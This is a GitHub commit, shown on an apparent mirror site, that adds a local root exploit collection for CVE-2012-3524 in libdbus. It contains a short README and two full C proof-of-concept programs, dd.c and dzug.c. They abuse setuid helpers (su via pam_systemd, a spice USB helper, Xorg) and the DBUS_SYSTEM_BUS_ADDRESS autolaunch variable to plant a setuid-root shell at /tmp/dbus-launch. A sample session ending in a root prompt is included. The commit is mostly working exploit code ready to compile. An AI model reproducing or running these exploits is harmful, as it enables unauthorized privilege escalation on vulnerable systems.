Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit c7ba9eb

Browse files
GitmanincGitmaninc
committed
linux-exp
1 parent 80ec5dd commit c7ba9eb

File tree

5 files changed

+253
-0
lines changed

5 files changed

+253
-0
lines changed

2012/CVE-2012-3524/README.md

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
# CVE-2012-3524
2+
```
3+
libdbus 1.5.x and earlier,
4+
when used in setuid or other privileged programs in X.org and possibly other products,
5+
allows local users to gain privileges and execute arbitrary code via the DBUS_SYSTEM_BUS_ADDRESS environment variable.
6+
NOTE: libdbus maintainers state that this is a vulnerability in the applications that do not cleanse environment variables,
7+
not in libdbus itself: "we do not support use of libdbus in setuid binaries that do not sanitize their environment before their first call into libdbus."
8+
```
9+
10+
11+
Vulnerability reference:
12+
* [CVE-2012-3524](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3524)
13+
* [exp-db](https://www.exploit-db.com/exploits/21323/)
14+
15+
## libdbus
16+
```
17+
1.5.x and earlier
18+
```
19+
20+
21+
22+
23+

2012/CVE-2012-3524/dd

9.8 KB
Binary file not shown.

2012/CVE-2012-3524/dd.c

Lines changed: 115 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,115 @@
1+
/* CVE-2012-3524 PoC (C) 2012 Sebastian Krahmer
2+
*
3+
* edited by Pashkela for RDOT.ORG (23.01.2013)
4+
*
5+
* su auto vector (need tty + current user password)
6+
*
7+
* Trivial non-dbus root exploit. (Yes, it is 2012!)
8+
*
9+
* The underlying bug (insecure getenv() by default) has been
10+
* reported ages ago, but nobody really cared. Unless you have an
11+
* exploit...
12+
* ==============================================================
13+
* Ubuntu 9.04
14+
*
15+
* an@an-desktop:~$ uname -a
16+
* Linux an-desktop 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
17+
* an@an-desktop:~$ gcc s.c -o s
18+
* an@an-desktop:~$ id
19+
* uid=1000(an) gid=1000(an) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(an)
20+
* an@an-desktop:~$ ./s
21+
* [**] CVE-2012-3524 xSports -- this is not a dbus exploit!
22+
*
23+
*[*] Preparing ...
24+
*[+] Type current user passwd when asked
25+
*[*] Waiting 10s for dbus-launch to drop boomshell.
26+
* Password: .......
27+
* bash: [+] GOT root!: No such file or directory
28+
* ...
29+
* [!] Hurra!
30+
* bash-3.2# id
31+
* uid=0(root) gid=1000(an) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(an)
32+
* bash-3.2#
33+
* ==============================================================
34+
*/
35+
36+
#include <stdio.h>
37+
#include <stdlib.h>
38+
#include <unistd.h>
39+
#include <errno.h>
40+
#include <string.h>
41+
#include <sys/types.h>
42+
#include <sys/wait.h>
43+
#include <sys/signal.h>
44+
#include <sys/stat.h>
45+
46+
47+
int main(int argc, char **argv)
48+
{
49+
int i = 0;
50+
struct stat st;
51+
pid_t pid = 0;
52+
char *env[] = {
53+
"PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin",
54+
"DBUS_STARTER_BUS_TYPE=system",
55+
"DBUS_SYSTEM_BUS_ADDRESS=autolaunch:",
56+
NULL,
57+
NULL
58+
};
59+
60+
61+
char *su[] = {"/bin/su",NULL,"[+] GOT root!", NULL};
62+
63+
char **a = su;
64+
char *dbus[] = {"/tmp/dbus-launch", NULL};
65+
char *sh[] = {"/bin/bash", "--noprofile", "--norc", NULL};
66+
char me[0x1000];
67+
68+
if (geteuid() == 0 && argc > 1) {
69+
chown("/tmp/dbus-launch", 0, 0);
70+
chmod("/tmp/dbus-launch", 04755);
71+
exit(errno);
72+
} else if (geteuid() == 0) {
73+
setuid(0);
74+
execve(*sh, sh, NULL);
75+
return errno;
76+
}
77+
78+
printf("[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n");
79+
memset(me, 0, sizeof(me));
80+
81+
if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) {
82+
/* Solaris */
83+
readlink("/proc/self/path/a.out", me, sizeof(me) - 1);
84+
}
85+
symlink(me, "/tmp/dbus-launch");
86+
printf("[+] Type current user passwd when asked\n");
87+
env[3] = "DISPLAY=:7350";
88+
su[1] = getenv("USER");
89+
a = su;
90+
91+
if ((pid = fork()) == 0) {
92+
execve(*a, a, env);
93+
exit(0);
94+
}
95+
96+
printf("[*] Waiting 10s for dbus-launch to drop boomshell.\n");
97+
98+
for (i = 0; i < 10; ++i) {
99+
sleep(1);
100+
printf("."); fflush(stdout);
101+
}
102+
kill(pid, SIGKILL);
103+
waitpid(pid, NULL, 0);
104+
105+
for (;;) {
106+
stat(*dbus, &st);
107+
if ((st.st_mode & 04755) == 04755)
108+
break;
109+
sleep(1);
110+
}
111+
printf("\n[!] Hurra!\n");
112+
113+
execve(*dbus, dbus, NULL);
114+
return errno;
115+
}

2012/CVE-2012-3524/dzug

10.5 KB
Binary file not shown.

2012/CVE-2012-3524/dzug.c

Lines changed: 115 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,115 @@
1+
/* dzug.c CVE-2012-3524 PoC (C) 2012 Sebastian Krahmer
2+
*
3+
* Trivial non-dbus root exploit. (Yes, it is 2012!)
4+
*
5+
* The underlying bug (insecure getenv() by default) has been
6+
* reported ages ago, but nobody really cared. Unless you have an
7+
* exploit...
8+
*
9+
*/
10+
11+
#include <stdio.h>
12+
#include <stdlib.h>
13+
#include <unistd.h>
14+
#include <errno.h>
15+
#include <string.h>
16+
#include <sys/types.h>
17+
#include <sys/wait.h>
18+
#include <sys/signal.h>
19+
#include <sys/stat.h>
20+
21+
22+
int main(int argc, char **argv)
23+
{
24+
int i = 0;
25+
struct stat st;
26+
pid_t pid = 0;
27+
char *env[] = {
28+
"PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin",
29+
"DBUS_STARTER_BUS_TYPE=system",
30+
"DBUS_SYSTEM_BUS_ADDRESS=autolaunch:",
31+
NULL,
32+
NULL
33+
};
34+
35+
36+
/* the pam_systemd vector */
37+
char *su[] = {"/bin/su", NULL, "blah", NULL};
38+
39+
/* the spice vector */
40+
char *spice[] = {"/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper", NULL};
41+
42+
/* the Xorg vector, for older Linux dists and Solaris */
43+
char *xorg[] = {"/usr/bin/Xorg", ":7350", NULL};
44+
45+
char **a = xorg;
46+
char *dbus[] = {"/tmp/dbus-launch", NULL};
47+
char *sh[] = {"/bin/bash", "--noprofile", "--norc", NULL};
48+
char me[0x1000];
49+
50+
if (geteuid() == 0 && argc > 1) {
51+
chown("/tmp/dbus-launch", 0, 0);
52+
chmod("/tmp/dbus-launch", 04755);
53+
exit(errno);
54+
} else if (geteuid() == 0) {
55+
setuid(0);
56+
execve(*sh, sh, NULL);
57+
return errno;
58+
}
59+
60+
printf("[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n");
61+
memset(me, 0, sizeof(me));
62+
63+
if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) {
64+
/* Solaris */
65+
readlink("/proc/self/path/a.out", me, sizeof(me) - 1);
66+
}
67+
symlink(me, "/tmp/dbus-launch");
68+
69+
if (stat(spice[0], &st) == 0) {
70+
if ((st.st_mode & 04000) == 04000) {
71+
printf("[+] Using spice helper ...\n");
72+
a = spice;
73+
}
74+
} else if (stat("/lib64/security/pam_systemd.so", &st) == 0) {
75+
printf("[+] Using pam_systemd helper (type user passwd when asked) ...\n");
76+
env[3] = "DISPLAY=:7350";
77+
su[1] = getenv("USER");
78+
a = su;
79+
} else if (stat(xorg[0], &st) == 0) {
80+
if ((st.st_mode & 04000) == 04000)
81+
printf("[+] Using Xorg helper ...\n");
82+
else {
83+
printf("[-] No suitable suid helper found.\n");
84+
exit(0);
85+
}
86+
} else {
87+
printf("[-] No suitable suid helper found.\n");
88+
exit(0);
89+
}
90+
91+
if ((pid = fork()) == 0) {
92+
execve(*a, a, env);
93+
exit(0);
94+
}
95+
96+
printf("[*] Waiting 10s for dbus-launch to drop boomshell.\n");
97+
98+
for (i = 0; i < 10; ++i) {
99+
sleep(1);
100+
printf("."); fflush(stdout);
101+
}
102+
kill(pid, SIGKILL);
103+
waitpid(pid, NULL, 0);
104+
105+
for (;;) {
106+
stat(*dbus, &st);
107+
if ((st.st_mode & 04755) == 04755)
108+
break;
109+
sleep(1);
110+
}
111+
printf("\n[!] Hurra!\n");
112+
113+
execve(*dbus, dbus, NULL);
114+
return errno;
115+
}

0 commit comments

Comments
 (0)